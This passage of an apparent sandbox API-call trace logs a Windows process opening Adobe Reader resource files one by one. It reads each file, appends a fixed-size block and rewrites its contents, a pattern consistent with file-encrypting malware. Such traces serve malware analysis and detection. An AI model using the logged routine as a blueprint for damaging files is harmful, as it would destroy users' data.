lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.977] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3cc [0097.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.978] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.978] ReleaseMutex (hMutex=0x168) returned 1 [0097.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pol.fca", lpUsedDefaultChar=0x0) returned 7 [0097.978] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3cc, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x345f2bc*=0x3cc, lpOverlapped=0x0) returned 1 [0097.980] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0097.980] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x954, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x345f2d0*=0x954, lpOverlapped=0x0) returned 1 [0097.980] CloseHandle (hObject=0x1cc) returned 1 [0097.980] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.981] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.981] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4c00 [0097.981] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.981] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.981] ReleaseMutex (hMutex=0x168) returned 1 [0097.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rum.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rum.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rum.hyp", lpUsedDefaultChar=0x0) returned 7 [0097.981] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.983] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3c00 [0097.983] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3c00 [0097.984] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0097.985] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.985] CloseHandle (hObject=0x1cc) returned 1 [0097.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.986] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.986] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x59c [0097.986] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.986] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.986] ReleaseMutex (hMutex=0x168) returned 1 [0097.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sgr.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sgr.fca", lpUsedDefaultChar=0x0) returned 7 [0097.986] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x59c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x345f2bc*=0x59c, lpOverlapped=0x0) returned 1 [0097.988] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0097.988] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xb24, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xb24, lpOverlapped=0x0) returned 1 [0097.988] CloseHandle (hObject=0x1cc) returned 1 [0097.988] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.990] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.990] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7ff9 [0097.990] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.990] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.990] ReleaseMutex (hMutex=0x168) returned 1 [0097.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo32.clx", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slo32.clx", lpUsedDefaultChar=0x0) returned 9 [0097.990] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.992] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6ff9 [0097.992] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.993] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6ff9 [0097.993] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.994] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0097.994] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.994] CloseHandle (hObject=0x1cc) returned 1 [0097.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.995] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.995] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7ffe [0097.995] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.995] ReleaseMutex (hMutex=0x168) returned 1 [0097.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn32.clx", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spn32.clx", lpUsedDefaultChar=0x0) returned 9 [0097.996] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.997] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6ffe [0097.997] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.998] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6ffe [0097.998] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0097.999] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.999] CloseHandle (hObject=0x1cc) returned 1 [0097.999] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0098.000] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0098.000] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x800 [0098.000] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0098.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.000] ReleaseMutex (hMutex=0x168) returned 1 [0098.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0098.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tur.hyp", lpUsedDefaultChar=0x0) returned 7 [0098.000] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x345f2bc*=0x800, lpOverlapped=0x0) returned 1 [0098.431] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0098.432] WriteFile (in: hFile=0x1cc, lpBuffer=0x288be18*, nNumberOfBytesToWrite=0xd88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288be18*, lpNumberOfBytesWritten=0x345f2d0*=0xd88, lpOverlapped=0x0) returned 1 [0098.432] CloseHandle (hObject=0x1cc) returned 1 [0098.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0099.752] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0099.752] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x37c40 [0099.752] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0099.752] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.752] ReleaseMutex (hMutex=0x168) returned 1 [0099.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl_gb18030.cnv", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl_gb18030.cnv", cchWideChar=15, lpMultiByteStr=0x1f7340c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ctl_gb18030.cnv", lpUsedDefaultChar=0x0) returned 15 [0099.753] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0099.757] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x36c40 [0099.757] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.758] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x36c40 [0099.759] WriteFile (in: hFile=0x204, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.760] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0099.760] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0099.761] CloseHandle (hObject=0x204) returned 1 [0099.761] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0099.763] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0099.764] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5ce8 [0099.764] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0099.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.764] ReleaseMutex (hMutex=0x168) returned 1 [0099.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARABIC.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARABIC.TXT", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARABIC.TXT", lpUsedDefaultChar=0x0) returned 10 [0099.764] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.771] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4ce8 [0099.771] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.406] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4ce8 [0101.406] WriteFile (in: hFile=0x204, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.407] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0101.407] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.407] CloseHandle (hObject=0x204) returned 1 [0101.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0101.409] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.409] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x342b [0101.409] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.409] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.409] ReleaseMutex (hMutex=0x168) returned 1 [0101.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREEK.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GREEK.TXT", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GREEK.TXT", lpUsedDefaultChar=0x0) returned 9 [0101.409] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.411] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: 